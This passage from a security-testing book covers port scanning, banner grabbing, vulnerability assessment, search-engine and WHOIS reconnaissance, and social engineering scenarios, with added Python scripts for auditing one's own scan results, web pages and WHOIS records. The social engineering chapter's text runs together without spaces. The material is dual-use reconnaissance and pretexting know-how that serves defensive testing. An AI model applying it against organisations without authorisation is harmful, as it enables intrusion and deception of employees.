Scanning internally is easy. Simply connect your PC to the network, load the software, and fire away. Just be aware of network segmentation and internal IPSs that may impede your work. Scanning from outside your network takes a few more steps, but it can be done. The easiest way to connect and get an outside-in perspective is to assign your computer a public IP address and plug that system into a switch on the public side of your firewall or router. Physically, the computer isn’t on the Internet looking in, but this type of connection works just the same as long as it’s outside your network perimeter. You can also do this outside-in scan from home or from a remote office location.

Determining What’s Running on Open Ports

As a security professional, you need to gather the things that count when scanning your systems. You can often identify the following information:

Protocols in use, such as IP, domain name system (DNS), and NetBIOS (Network Basic Input/Output System)
Services running on the hosts, such as e-mail, web servers, and database applications
Available remote access services, such as Remote Desktop Protocol (RDP), telnet, and Secure Shell (SSH)
Virtual Private Network (VPN) services, such as PPTP, SSL/TLS, and IPsec
Permissions and authentication requirements for network shares

You can look for the following sampling of open ports (your network-scanning program reports these as accessible or open):

Ping (ICMP echo) replies, showing that ICMP traffic is allowed to and from the host
TCP port 21, showing that FTP is running
TCP port 23, showing that telnet is running
TCP ports 25 or 465 (SMTP and SMTPS), 110 or 995 (POP3 and POP3S), or 143 or 993 (IMAP and IMAPS), showing that an e-mail server is running
TCP/UDP port 53, showing that a DNS server is running
TCP ports 80, 443, and 8080, showing that a web server or web proxy is running
TCP/UDP ports 135, 137, 138, 139 and, especially, 445, showing that a Windows host is running

Thousands of ports can be open—65,534 each for both TCP (Transmission Control Protocol) and UDP (User Datagram Protocol), to be exact. I cover many popular port numbers when describing security checks throughout this book. A continually updated listing of all well-known port numbers (ports 0–1023) and registered port numbers (ports 1024–49151), with their associated protocols and services, is located at www.iana.org/assignments/service-names-port-numbers/service-names-port-numbers.txt. You can also perform a port number lookup at www.cotse.com/cgi-bin/port.cgi.

If a service doesn’t respond on a TCP or UDP port, that doesn’t mean it’s not running. You may have to dig further to find out.

If you detect a web server running on the system that you test, you can check the software version by using one of the following methods:

Type the site’s name followed by a page that you know doesn’t exist, such as www.your_domain.com/1234.html. Many web servers return an error page showing detailed version information.
Use Netcraft’s What’s that site running? search utility (www.netcraft.com), which connects to your server from the Internet and displays the web server version and operating system, as shown in Figure 4-1.

Figure 4-1: Netcraft’s web server version utility.

You can dig deeper for more specific information on your hosts:

NMapWin (http://sourceforge.net/projects/nmapwin) can determine the system OS version.
An enumeration tool (such as SoftPerfect Network Scanner at www.softperfect.com/products/networkscanner) can extract users, groups, and file and share permissions directly from Windows.
Many systems return useful banner information when you connect to a service or application running on a port. For example, if you telnet to an e-mail server on port 25 by entering telnet mail.your_domain.com 25 at a command prompt, you may see something like this:

220 mail.your_domain.com ESMTP all_the_version_info_you_need_to_hack Ready

Most e-mail servers return detailed information, such as the version and the current service pack installed. After you have this information, you (and the bad guys) can determine the vulnerabilities of the system from some of the websites listed in the next section.

An e-mail to an invalid address might return with detailed e-mail header information. A bounced message often discloses information that can be used against you, including internal IP addresses and software versions. On certain Windows systems, you can use this information to establish unauthenticated connections and sometimes even map drives. I cover these issues in Chapter 12.
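The port list earlier in this section and the banner information just shown are exactly what a scan log should capture. The following is an added Python example (not code from the book) that parses Nmap’s grepable output (the -oG format) for a constructed scan of two hosts, applies the chapter’s port-to-role rules, and flags the items a defender would follow up on: cleartext services, SMB reachable from the scanning position, and services whose version field (filled in by -sV) discloses what they run. The addresses, host names, versions and risk labels are this example’s own.

```python
"""Triage Nmap grepable output for the port and banner indicators in this chapter.

Added example, not from the book. SAMPLE_OG is CONSTRUCTED to look like the
output of `nmap -sV -oG - <targets>`; the addresses, names and versions are invented.
"""
import re
from collections import namedtuple

OpenPort = namedtuple("OpenPort", "host hostname port proto service version")

# Constructed -oG output. Each "Ports:" line holds comma-separated entries of the form
# port/state/protocol/owner/service/rpcinfo/version/
SAMPLE_OG = """\
# Nmap 7.01 scan initiated (constructed sample)
Host: 192.0.2.10 (mail.your_domain.com)\tStatus: Up
Host: 192.0.2.10 (mail.your_domain.com)\tPorts: 25/open/tcp//smtp//Postfix smtpd/, 110/open/tcp//pop3//Dovecot pop3d/, 143/open/tcp//imap//Dovecot imapd/, 443/open/tcp//https//Apache httpd 2.4.7 ((Ubuntu))/\tIgnored State: closed (996)
Host: 192.0.2.20 (fileserver.your_domain.com)\tStatus: Up
Host: 192.0.2.20 (fileserver.your_domain.com)\tPorts: 21/open/tcp//ftp//Microsoft ftpd/, 23/open/tcp//telnet///, 135/open/tcp//msrpc//Microsoft Windows RPC/, 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds//Windows Server 2008 R2 microsoft-ds/\tIgnored State: filtered (995)
# Nmap done (constructed sample)
"""

_HOST_RE = re.compile(r"^Host:\s+(\S+)\s+\(([^)]*)\)\t(.*)$")
_PORT_RE = re.compile(r"(\d+)/(\w+)/(\w+)/([^/]*)/([^/]*)/([^/]*)/([^/]*)/")

# Port groups the chapter uses as role indicators.
ROLE_PORTS = {
    "e-mail server": {25, 465, 110, 995, 143, 993},
    "DNS server": {53},
    "web server or web proxy": {80, 443, 8080},
    "Windows host": {135, 137, 138, 139, 445},
}

# Follow-up items for the tester's log (the wording is this example's own).
CONCERNS = {
    21: "FTP: credentials and files cross the wire in cleartext",
    23: "telnet: cleartext remote administration",
    110: "POP3 without TLS: cleartext mailbox credentials",
    143: "IMAP without TLS: cleartext mailbox credentials",
    445: "SMB reachable from the scanning position",
}


def parse_grepable(text):
    """Return an OpenPort for every open port in -oG output."""
    found = []
    for line in text.splitlines():
        m = _HOST_RE.match(line)
        if not m:
            continue  # comment lines carry no port data
        ip, hostname, rest = m.groups()
        # Remaining tab-separated fields, e.g. "Ports: ..." and "Ignored State: ..."
        fields = dict(f.split(": ", 1) for f in rest.split("\t") if ": " in f)
        for port, state, proto, _owner, service, _rpc, version in _PORT_RE.findall(fields.get("Ports", "")):
            if state == "open":
                found.append(OpenPort(ip, hostname, int(port), proto, service, version))
    return found


def triage(open_ports):
    """Group open ports by host and attach role guesses and follow-up items."""
    report = {}
    for p in open_ports:
        entry = report.setdefault(p.host, {"hostname": p.hostname, "open": [], "roles": set(), "follow_up": []})
        entry["open"].append(p.port)
        entry["roles"].update(role for role, nums in ROLE_PORTS.items() if p.port in nums)
        if p.port in CONCERNS:
            entry["follow_up"].append(f"{p.port}/{p.proto} ({p.service}): {CONCERNS[p.port]}")
        if p.version:  # -sV filled the version field: the service announced what it runs
            entry["follow_up"].append(f"{p.port}/{p.proto} ({p.service}): banner discloses '{p.version}'")
    return report


if __name__ == "__main__":
    for host, info in triage(parse_grepable(SAMPLE_OG)).items():
        print(f"{host} ({info['hostname']}): open {sorted(info['open'])}")
        print("  looks like:", ", ".join(sorted(info["roles"])) or "undetermined")
        for item in info["follow_up"]:
            print("  -", item)
```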

Assessing Vulnerabilities

After finding potential security holes, the next step is to confirm whether they’re indeed vulnerabilities in the context of your environment. Before you test, perform some manual searching. You can research websites and vulnerability databases, such as these:

Common Vulnerabilities and Exposures (http://cve.mitre.org/cve)
US-CERT Vulnerability Notes Database (www.kb.cert.org/vuls)
NIST National Vulnerability Database (http://nvd.nist.gov)

These sites list known vulnerabilities—at least the formally classified ones. As I explain in this book, you see that many other vulnerabilities are more generic in nature and can’t easily be classified. If you can’t find a vulnerability documented on one of these sites, search the vendor’s site. You can also find a list of commonly exploited vulnerabilities at www.sans.org/critical-security-controls. This site contains the SANS Critical Security Controls consensus list, which is compiled and updated by the SANS organization.

If you don’t want to research your potential vulnerabilities and can jump right into testing, you have a couple of options:

Manual assessment: You can assess the potential vulnerabilities by connecting to the ports that are exposing the service or application and poking around in these ports. You should manually assess certain systems (such as web applications). The vulnerability reports in the preceding databases often disclose how to do this—at least generally. If you have a lot of free time, performing these tests manually might work for you.
Automated assessment: Manual assessments are a great way to learn, but people usually don’t have the time for most manual steps. If you’re like me, you’ll scan for vulnerabilities automatically when you can and then dig around manually as needed.

Many great vulnerability assessment scanners test for flaws on specific platforms (such as Windows and Linux) and types of networks (either wired or wireless). They test for specific system vulnerabilities, and some focus around standards like the SANS Critical Security Controls and the Open Web Application Security Project (www.owasp.org). Some scanners can map out the business logic within a web application; others can map out a view of the network; others can help software developers test for code flaws. The drawback to these tools is that they find only individual vulnerabilities; they often don’t necessarily aggregate and correlate vulnerabilities across an entire network. That’s where your skills, and the methodologies I share in this book, come into play!

One of my favorite security tools is a vulnerability scanner called Nexpose by Rapid7 (www.rapid7.com/products/nexpose). It’s both a port scanner and vulnerability assessment tool, and it offers a great deal of help for vulnerability management. You can run one-time scans immediately or schedule scans to run on a periodic basis.

As with most good security tools, you pay for Nexpose. It isn’t the least expensive tool, but you definitely get what you pay for, especially when it comes to others taking you seriously (such as when PCI DSS compliance is required of your business). There’s also a free version of Nexpose, dubbed the Community Edition, for scanning smaller networks with fewer features. Additional vulnerability scanners that work well include QualysGuard (www.qualys.com) and GFI LanGuard (www.gfi.com/products-and-solutions/network-security-solutions).

Assessing vulnerabilities with a tool like Nexpose requires follow-up expertise. You can’t rely on the scanner results alone. You must validate the vulnerabilities it reports. Study the reports to base your recommendations on the context and criticality of the tested systems.

Penetrating the System

You can use identified security vulnerabilities to do the following:

Gain further information about the host and its data.
Obtain a remote command prompt.
Start or stop certain services or applications.
Access other systems.
Disable logging or other security controls.
Capture screenshots.
Access sensitive files.
Send an e-mail as the administrator.
Perform SQL injection.
Launch a DoS attack.
Upload a file or create a backdoor user account proving the exploitation of a vulnerability.

Metasploit (www.metasploit.com) is great for exploiting many of the vulnerabilities you find and allows you to fully penetrate many types of systems. Ideally, you’ve already made your decision on whether to fully exploit the vulnerabilities you find. You might want to leave well enough alone by just demonstrating the existence of the vulnerabilities and not actually exploiting them.

If you want to further delve into the ethical hacking methodology, I recommend you check out the Open Source Security Testing Methodology Manual (www.isecom.org/research/osstmm.html) for more information.

Part II

Putting Security Testing in Motion

Find out how to look for the most common security flaws in a free article at www.dummies.com/extras/hacking.

In this part…

Let the games begin! You’ve waited long enough—now’s the time to start testing the security of your systems. But where do you start? How about with your three Ps—your people, your physical systems, and your passwords? These are, after all, three of the most easily and commonly attacked targets in your organization.

This part starts with a discussion of hacking people (otherwise known as social engineering). It then goes on to look at physical security vulnerabilities. Of course, I’d be remiss in a part about people if I skipped passwords, so I cover the technical details of testing those as well. This is a great way to get the ball rolling to warm you up for the more specific security tests later in the book.

Chapter 5

Information Gathering

In This Chapter

Gleaning information about your organization from the Internet

Web resources

Seeking out information you (and others) can benefit from

One of the most important aspects in determining how your organization is at risk is to find out what information is publicly available about your business and your systems. Gathering this information is such an important part of your overall methodology that I thought the subject deserves a dedicated chapter. In this chapter, I outline some free and easy ways to see what the world sees about you and your organization. You may be tempted to bypass this exercise in favor of the cooler and sexier technical security flaws, but don’t fall into the trap. Gathering this type of information is critical and often where most security breaches begin.

Gathering Public Information

The amount of information you can gather about an organization’s business and information systems that is widely available on the Internet is staggering. To see for yourself, the techniques outlined in the following sections can be used to gather information about your own organization.

Social media

Social media sites are the new means for businesses interacting online. Perusing the following sites can provide untold details on any given business and its people:

Facebook (www.facebook.com)
LinkedIn (www.linkedin.com)
Twitter (https://twitter.com)
YouTube (www.youtube.com)

As we’ve all witnessed, employees are often very forthcoming about what they do for work, details about their business, and even what they think about their bosses—especially after throwing back a few when their social filter has gone off track! I’ve also found interesting insight based on what ex-employees say about their former employers at Glassdoor (www.glassdoor.com).

Web search

Performing a web search or simply browsing your organization’s website can turn up the following information:

Employee names and contact information
Important company dates
Incorporation filings
SEC filings (for public companies)
Press releases about physical moves, organizational changes, and new products
Mergers and acquisitions
Patents and trademarks
Presentations, articles, webcasts, or webinars

Bing (www.bing.com) and Google (www.google.com) ferret out information—in everything from word processing documents to graphics files—on any publicly accessible computer. And they’re free. Google is my favorite. Entire books have been written about using Google, so expect any criminal hacker to be quite experienced in using this tool, including against you. (See Chapter 15 for more about Google hacking.)

With Google, you can search the Internet in several ways:

Typing keywords. This kind of search often reveals hundreds and sometimes millions of pages of information—such as files, phone numbers, and addresses—that you never guessed were available.
Performing advanced web searches. Google’s advanced search options can find sites that link back to your company’s website. This type of search often reveals a lot of information about partners, vendors, clients, and other affiliations.
Using switches to dig deeper into a website. For example, if you want to find a certain word or file on your website, simply enter a line like one of the following into Google:

site:www.your_domain.com keyword

site:www.your_domain.com filename

You can even do a generic filetype search across the entire Internet to see what turns up, such as this:

filetype:swf company_name

Use the preceding search to find Flash .swf files, which can be downloaded and decompiled to reveal sensitive information that can be used against your business, as I cover in detail in Chapter 15.

Use the following search to hunt for PDF documents that might contain sensitive information that can be used against your business:

filetype:pdf company_name confidential

Web crawling

Web-crawling utilities, such as HTTrack Website Copier (www.httrack.com), can mirror your website by downloading every publicly accessible file from it, similar to how a web vulnerability scanner crawls the website it’s testing. You can then inspect that copy of the website offline, digging into the following:

The website layout and configuration
Directories and files that might not otherwise be obvious or readily accessible
The HTML and script source code of web pages
Comment fields

Comment fields often contain useful information such as names and e-mail addresses of the developers and internal IT personnel, server names, software versions, internal IP addressing schemes, and general comments about how the code works. In case you’re interested, you can prevent some types of web crawling by creating Disallow entries in your web server’s robots.txt file as outlined at www.w3.org/TR/html4/appendix/notes.html. You can even enable web tarpitting in certain firewalls and intrusion prevention systems (IPSs). However, crawlers (and attackers) that are smart enough can find ways around these controls.

Contact information for developers and IT personnel is great for social engineering attacks. I cover social engineering in Chapter 6.

Websites

The following websites may provide specific information about an organization and its employees:

Government and business websites: www.hoovers.com and http://finance.yahoo.com give detailed information about public companies. www.sec.gov/edgar.shtml shows SEC filings of public companies. www.uspto.gov offers patent and trademark registrations. The website for your state’s Secretary of State or similar organization can offer incorporation and corporate officer information.

Background checks and other personal information, from websites such as LexisNexis.com (www.lexisnexis.com) and ZabaSearch (www.zabasearch.com).

Mapping the Network

As part of mapping out your network, you can search public databases and resources to see what other people know about your systems.
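Reviewing a mirrored copy of your own site for the comment-field leaks listed above is something you can script. The following is an added Python example (not code from the book): it pulls every HTML comment out of a constructed page of the kind HTTrack would save, matches the categories this section names (e-mail addresses, RFC 1918 internal addresses, software versions, internal host names), and also shows, with a constructed robots.txt, that a Disallow entry only governs crawlers that choose to honor it. The page contents, host naming scheme and regular expressions are this example’s own.

```python
"""Check a mirrored HTML page for the comment-field disclosures this section describes,
and show what a robots.txt Disallow entry does (and does not) cover.

Added example, not from the book. SAMPLE_PAGE and SAMPLE_ROBOTS are CONSTRUCTED to stand
in for files pulled down by a crawler such as HTTrack; people, hosts and versions are invented.
"""
import re
import urllib.robotparser
from html.parser import HTMLParser

SAMPLE_PAGE = """\
<!DOCTYPE html>
<html><head><title>Your Domain - Careers</title>
<!-- Template by jsmith@your_domain.com, last touched by the internal IT team -->
</head><body>
<!-- TODO: move the form handler off intranet-app01 (10.20.30.41) before go-live -->
<!-- Served by Apache/2.2.15 (CentOS) with PHP 5.3.3; see build notes -->
<p>Join our team!</p>
<!-- end of page -->
</body></html>
"""

SAMPLE_ROBOTS = """\
User-agent: *
Disallow: /internal/
Disallow: /old-site/
"""


class CommentCollector(HTMLParser):
    """Collect the text of every <!-- ... --> comment in a page."""

    def __init__(self):
        super().__init__()
        self.comments = []

    def handle_comment(self, data):
        self.comments.append(data.strip())


def extract_comments(html):
    parser = CommentCollector()
    parser.feed(html)
    parser.close()
    return parser.comments


# The categories the chapter says comment fields tend to leak.
LEAK_PATTERNS = {
    "e-mail address": re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+"),
    # RFC 1918 private ranges: 10/8, 172.16/12, 192.168/16
    "internal IP address": re.compile(
        r"\b(?:10\.\d{1,3}\.\d{1,3}\.\d{1,3}"
        r"|172\.(?:1[6-9]|2\d|3[01])\.\d{1,3}\.\d{1,3}"
        r"|192\.168\.\d{1,3}\.\d{1,3})\b"),
    # "Product/1.2.3" server tokens or "PHP 5.3.3"-style product mentions
    "software version": re.compile(
        r"\b[A-Za-z][\w.-]*/\d+(?:\.\d+)+\b|\b(?:PHP|MySQL|Apache|nginx|IIS)\s+\d+(?:\.\d+)+", re.I),
    # heuristic for names like intranet-app01 (a constructed naming scheme)
    "internal host name": re.compile(r"\b[a-z]+-[a-z]+\d{2}\b"),
}


def find_leaks(html):
    """Return one finding per (category, match) found in the page's comments."""
    findings = []
    for comment in extract_comments(html):
        for category, pattern in LEAK_PATTERNS.items():
            for match in pattern.findall(comment):
                findings.append({"category": category, "match": match, "comment": comment})
    return findings


def blocked_by_robots(robots_txt, path, user_agent="*"):
    """True if a *cooperating* crawler would skip path. Hostile crawlers ignore robots.txt,
    so this is a courtesy signal, not an access control."""
    rp = urllib.robotparser.RobotFileParser()
    rp.parse(robots_txt.splitlines())
    return not rp.can_fetch(user_agent, path)


if __name__ == "__main__":
    for f in find_leaks(SAMPLE_PAGE):
        print(f"{f['category']:20} {f['match']!r:28} in: {f['comment']}")
    for path in ("/internal/admin.html", "/careers.html"):
        print(path, "disallowed" if blocked_by_robots(SAMPLE_ROBOTS, path) else "allowed")
```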

WHOIS

The best starting point is to perform a WHOIS lookup by using any one of the tools available on the Internet. In case you’re not familiar, WHOIS is a protocol you can use to query online databases such as DNS registries to learn more about domain names and IP address blocks. You may have used WHOIS to check whether a particular Internet domain name is available.

For security testing, WHOIS provides the following information that can give a hacker a leg up to start a social engineering attack or to scan a network:

Internet domain name registration information, such as contact names, phone numbers, and mailing addresses
DNS servers responsible for your domain

You can look up WHOIS information at one of the following places:

WHOIS.net (www.whois.net)
A domain registrar’s site, such as www.godaddy.com
Your ISP’s technical support site

Two of my favorite WHOIS tool websites are DNSstuff (www.dnsstuff.com) and MXToolBox (www.mxtoolbox.com). For example, you can run DNS queries directly from www.mxtoolbox.com to do the following:

Display general domain-registration information
Show which host handles e-mail for a domain (the Mail Exchanger or MX record)
Map the location of specific hosts
Determine whether the host is listed on certain spam blacklists

A free site you can use for more basic Internet domain queries is http://dnstools.com. Another commercial product called NetScanTools Pro (www.netscantools.com) is excellent at gathering such information. I cover this tool and others in more detail in Chapter 9.

The following list shows various lookup sites for other categories:

U.S. Government: www.dotgov.gov/portal/web/dotgov/whois
AFRINIC: www.afrinic.net (Regional Internet Registry for Africa)
APNIC: www.apnic.net/apnic-info/whois_search (Regional Internet Registry for the Asia Pacific Region)
ARIN: http://whois.arin.net/ui (Regional Internet Registry for North America, a portion of the Caribbean, and subequatorial Africa)
LACNIC: www.lacnic.net/en (Latin American and Caribbean Internet Addresses Registry)
RIPE Network Coordination Centre: https://apps.db.ripe.net/search/query.html (Europe, Central Asia, African countries north of the equator, and the Middle East)

If you’re not sure where to look for a specific country, www.nro.net/about-the-nro/list-of-country-codes-and-rirs-ordered-by-country-code has a reference guide.

Privacy policies

Check your website’s privacy policy. A good practice is to let your site’s users know what information is collected and how it’s being protected, but nothing more. I’ve seen many privacy policies that divulge a lot of technical details on security and related systems that should not be made public.

Make sure the people who write your privacy policies (often nontechnical lawyers) don’t divulge details about your information security infrastructure. Be careful to avoid the example of an Internet start-up businessman who once contacted me about a business opportunity. During the conversation, he bragged about his company’s security systems that ensured the privacy of client information (or so he thought). I went to his website to check out his privacy policy. He had posted the brand and model of firewall he was using, along with other technical information about his network and system architecture. This type of information could certainly be used against him by the bad guys. Not a good idea.
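The web front ends listed above all sit on the same simple protocol, and it is worth seeing what your own record hands out. The following is an added Python example (not code from the book): query_whois() performs a raw WHOIS query as defined in RFC 3912 (the domain name followed by CRLF on TCP port 43, reply read until the server closes), and parse_whois() plus exposure_summary() reduce a reply to the two things this section says an attacker gets from it: contact names, phone numbers, addresses and e-mail, and the name servers responsible for the domain. The response is constructed in the common Key: Value registrar style so the parser runs offline; the domain, people and hosts are invented.

```python
"""Query WHOIS over RFC 3912 and pull out the fields this section flags as useful to an
attacker: contact details and the DNS servers responsible for the domain.

Added example, not from the book. query_whois() opens a real TCP/43 connection;
SAMPLE_RESPONSE is CONSTRUCTED so the parser can be exercised offline.
"""
import socket

SAMPLE_RESPONSE = """\
% Constructed WHOIS response for demonstration only
Domain Name: YOUR_DOMAIN.COM
Registrar: Example Registrar, LLC
Updated Date: 2015-11-02T10:15:00Z
Registrant Name: Jane Doe
Registrant Organization: Your Domain Inc.
Registrant Street: 100 Main Street, Suite 400
Registrant City: Anytown
Registrant Phone: +1.5555550100
Registrant Email: jane.doe@your_domain.com
Admin Name: John Smith
Admin Phone: +1.5555550101
Admin Email: john.smith@your_domain.com
Tech Name: IT Helpdesk
Tech Email: helpdesk@your_domain.com
Name Server: NS1.YOUR_DOMAIN.COM
Name Server: NS2.YOUR_DOMAIN.COM
DNSSEC: unsigned
>>> Last update of WHOIS database: 2016-01-15T00:00:00Z <<<
"""


def query_whois(name, server, timeout=10):
    """Send one RFC 3912 query (name + CRLF) to server:43 and return the full reply."""
    with socket.create_connection((server, 43), timeout=timeout) as sock:
        sock.sendall(name.encode("ascii") + b"\r\n")
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:  # the server closes the connection when the answer is complete
                break
            chunks.append(data)
    return b"".join(chunks).decode("utf-8", errors="replace")


def parse_whois(text):
    """Turn 'Key: Value' lines into a dict of lists (keys such as Name Server repeat)."""
    fields = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(("%", "#", ">>>")):
            continue  # comments, legal notices and the trailer line
        if ": " not in line:
            continue
        key, value = line.split(": ", 1)
        fields.setdefault(key.strip().lower(), []).append(value.strip())
    return fields


CONTACT_ROLES = ("registrant", "admin", "tech")
CONTACT_ATTRS = ("name", "organization", "street", "city", "phone", "email")


def exposure_summary(fields):
    """Group the record into what the chapter lists: contacts and responsible DNS servers."""
    contacts = {}
    for key, values in fields.items():
        role, _, attr = key.rpartition(" ")  # "registrant phone" -> ("registrant", "phone")
        if role in CONTACT_ROLES and attr in CONTACT_ATTRS:
            contacts.setdefault(role, {})[attr] = values[0]
    return {
        "domain": fields.get("domain name", [""])[0].lower(),
        "name_servers": [ns.lower() for ns in fields.get("name server", [])],
        "contacts": contacts,
        # True when a real person's name, phone or e-mail is published (no privacy proxy)
        "personal_data_exposed": any(
            attr in c for c in contacts.values() for attr in ("name", "phone", "email")),
    }


if __name__ == "__main__":
    summary = exposure_summary(parse_whois(SAMPLE_RESPONSE))
    print("domain:", summary["domain"])
    print("name servers:", ", ".join(summary["name_servers"]))
    for role, details in summary["contacts"].items():
        print(f"{role}: {details}")
    print("personal data exposed:", summary["personal_data_exposed"])
```

Running the same summary over a live reply (query_whois("your_domain.com", "whois.verisign-grs.com") for a .com) shows whether your own registration publishes staff names and direct numbers or a registrar privacy proxy.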

Chapter6

SocialEngineeringInThisChapter

Understandingsocialengineering

Examiningtheramificationsofsocialengineering

Performingsocialengineeringtests

Protectingyourorganizationagainstsocialengineering

Socialengineeringtakesadvantageoftheweakestlinkinanyorganization’sinformationsecuritydefenses:people.Socialengineeringis“peoplehacking”andinvolvesmaliciouslyexploitingthetrustingnatureofhumanbeingstoobtaininformationthatcanbeusedforpersonalgain.

Socialengineeringisoneofthetoughesthackstoperpetratebecauseittakesbravadoandskilltocomeacrossastrustworthytoastranger.It’salsobyfarthetoughestthingtoprotectagainstbecausepeoplewhoaremakingtheirownsecuritydecisionsareinvolved.Inthischapter,Iexploretheconsequencesofsocialengineering,techniquesforyourownethicalhackingefforts,andspecificcountermeasurestodefendagainstsocialengineering.

IntroducingSocialEngineeringInasocialengineeringscenario,thosewithillintentposeassomeoneelsetogaininformationtheylikelycouldn’taccessotherwise.Theythentaketheinformationtheyobtainfromtheirvictimsandwreakhavoconnetworkresources,stealordeletefiles,andevencommitcorporateespionageorsomeotherformoffraudagainsttheorganizationtheyattack.Socialengineeringisdifferentfromphysicalsecurityexploits,suchasshouldersurfinganddumpsterdiving,butthetwotypesofhackingarerelatedandoftenareusedintandem.

Herearesomeexamplesofsocialengineering:

“Supportpersonnel”claimingthattheyneedtoinstallapatchornewversionofsoftwareonauser’scomputer,talktheuserintodownloadingthesoftware,andobtainremotecontrolofthesystem.“Vendors”claimingtoneedtoupdatetheorganization’saccountingpackageorphonesystem,askfortheadministratorpassword,andobtainfullaccess.“Employees”notifyingthesecuritydeskthattheyhavelosttheiraccessbadgetothedatacenter,receiveasetofkeysfromsecurity,andobtainunauthorizedaccesstophysicalandelectronicinformation.Phishinge-mailssentbywhomevertogatheruserIDsandpasswordsofunsuspectingrecipients.Theseattackscanbegenericinnatureormoretargeted—somethingcalledspear-phishingattacks.Thecriminalsthenusethosepasswordstoinstallmalware,gainaccesstothenetwork,captureintellectualproperty,andmore.

Sometimes,socialengineersactasconfidentandknowledgeablemanagersorexecutives.Atothertimestheymightplaytherolesofextremelyuninformedornaïveemployees.Theyalsomightposeasoutsiders,suchasITconsultantsormaintenanceworkers.Socialengineersaregreatatadaptingtotheiraudience.Ittakesaspecialtypeofpersonalitytopullthisoff,oftenresemblingthatofasociopath.

Effectiveinformationsecurity—especiallythesecurityrequiredforfightingsocialengineering—oftenbeginsandendswithyourusers.Otherchaptersinthisbookprovideadviceontechnicalcontrolsthatcanhelpfightsocialengineering,butneverforgetthatbasichumancommunicationsandinteractionhaveaprofoundeffectonthelevelofsecurityinyourorganizationatanygiventime.Thecandy-securityadageis“Hard,crunchyoutside;soft,chewyinside.”Thehard,crunchyoutsideisthelayerofmechanisms—suchasfirewalls,intrusionpreventionsystems,andcontentfiltering—thatorganizationstypicallyrelyontosecuretheirinformation.Thesoft,chewyinsideisthepeopleandtheprocessesinsidetheorganization.Ifthebadguyscangetpastthethickouterlayer,theycancompromisethe(mostly)defenselessinnerlayer.

StartingYourSocialEngineeringTestsIapproachtheethicalhackingmethodologiesinthischapterdifferentlythaninsubsequentchapters.Socialengineeringisanartandascience.Socialengineeringtakesgreatskilltoperformasasecurityprofessionalandishighly-dependentonyourpersonalityandoverallknowledgeoftheorganization.

Ifsocialengineeringisn’tnaturalforyou,considerusingtheinformationinthischapterforeducationalpurposessoyoucanlearntohowtobestdefendagainstit.Don’thesitatetohireathirdpartytoperformthistestingifthatmakesthebestbusinesssensefornow.

Socialengineeringcanharmpeople’sjobsandreputations,andconfidentialinformationcouldbeleaked.Thisisespeciallytruewhenphishingtestsareperformed.Planthingsoutandproceedwithcaution.

Youcanperformsocialengineeringattacksinmillionsofways.Fromwalkingthroughthefrontdoorpurportingtobesomeoneyou’renottolaunchinganall-oute-mailphishingcampaign,theworldisyouroyster.Forthisreason,andbecausetrainingspecificbehaviorsinasinglechapterisnexttoimpossible,Idon’tprovidehow-toinstructionsforcarryingoutsocialengineeringattacks.Instead,Idescribespecificsocialengineeringscenariosthathaveworkedwellformeandothers.Youcantailorthesesametricksandtechniquestoyourspecificsituation.

Anoutsidertotheorganizationmightperformcertainsocialengineeringtechniquessuchasphysicalintrusiontestsbest.Ifyouperformthesetestsagainstyourownorganization,actingasanoutsidermightbedifficultifeveryoneknowsyou.Thisriskofrecognitionmightnotbeaprobleminlargerorganizations,butifyouhaveasmall,close-knitcompany,peoplemightcatchon.

Youcanoutsourcesocialengineeringtestingtoanoutsidefirmorevenhaveatrustedcolleagueperformthetestsforyou.IcoverthetopicofoutsourcingsecurityandethicalhackinginChapter19.

WhyAttackersUseSocialEngineeringPeopleusesocialengineeringtobreakintosystemsandattaininformationbecauseit’softenthesimplestwayforthemtogetwhatthey’relookingfor.They’dmuchratherhavesomeoneopenthedoortotheorganizationthanphysicallybreakinandriskbeingcaught.Securitytechnologiessuchasfirewallsandaccesscontrolswon’tstopadeterminedsocialengineer.

Manysocialengineersperformtheirattacksslowlytoavoidsuspicion.Socialengineersgatherbitsofinformationovertimeandusetheinformationtocreateabroaderpictureoftheorganizationthey’retryingtomanipulate.Thereinliesoneoftheirgreatestassets:time.They’vegotnothingbuttimeandwilltaketheproperamountnecessarytoensuretheirattacksaresuccessfulAlternatively,somesocialengineeringattackscanbeperformedwithaquickphonecallore-mail.Themethodsuseddependontheattacker’sstyleandabilities.Eitherway,you’reatadisadvantage.

Socialengineersknowthatmanyorganizationsdon’thaveformaldataclassificationprograms,accesscontrolsystems,incidentresponseplans,orsecurityawarenessprograms,andtheytakeadvantageoftheseweaknesses.

Socialengineersoftenknowalittleaboutalotofthings—bothinsideandoutsidetheirtargetorganizations—becausethisknowledgehelpsthemintheirefforts.ThankstosocialmediasuchasLinkedIn,Facebook,andotheronlineresourcesIdiscussininChapter5,everytidbitofinformationtheyneedisoftenattheirdisposal.Themoreinformationsocialengineersgainaboutorganizations,theeasieritisforthemtoposeasemployeesorothertrustedinsiders.Socialengineers’knowledgeanddeterminationgivethemtheupperhandovermanagementandtheiremployeeswhodon’trecognizethevalueoftheinformationthatsocialengineersseek.

UnderstandingtheImplicationsManyorganizationshaveenemieswhowanttocausetroublethroughsocialengineering.Thesepeoplemightbecurrentorformeremployeesseekingrevenge,competitorswantingalegup,orhackerstryingtoprovetheirworth.

Regardlessofwhocausesthetrouble,everyorganizationisatrisk—especiallygiventhesprawlingInternetpresenceoftheaveragecompany.Largercompaniesspreadacrossseverallocationsareoftenmorevulnerablegiventheircomplexity,butsmallercompaniescanalsobeattacked.Everyone,fromreceptioniststosecurityguardstoexecutivestoITpersonnel,isapotentialvictimofsocialengineering.Helpdeskandcallcenteremployeesareespeciallyvulnerablebecausetheyaretrainedtobehelpfulandforthcomingwithinformation.

Socialengineeringhasseriousconsequences.Becausetheobjectiveofsocialengineeringistocoercesomeoneforinformationtoleadtoill-gottengains,anythingispossible.Effectivesocialengineerscanobtainthefollowinginformation:

UserpasswordsSecuritybadgesorkeystothebuildingandeventothecomputerroomIntellectualpropertysuchasdesignspecifications,sourcecode,orotherresearchanddevelopmentdocumentationConfidentialfinancialreportsPrivateandconfidentialemployeeinformationPersonally-identifiableinformation(PII)suchashealthrecordsandcardholderinformationCustomerlistsandsalesprospects

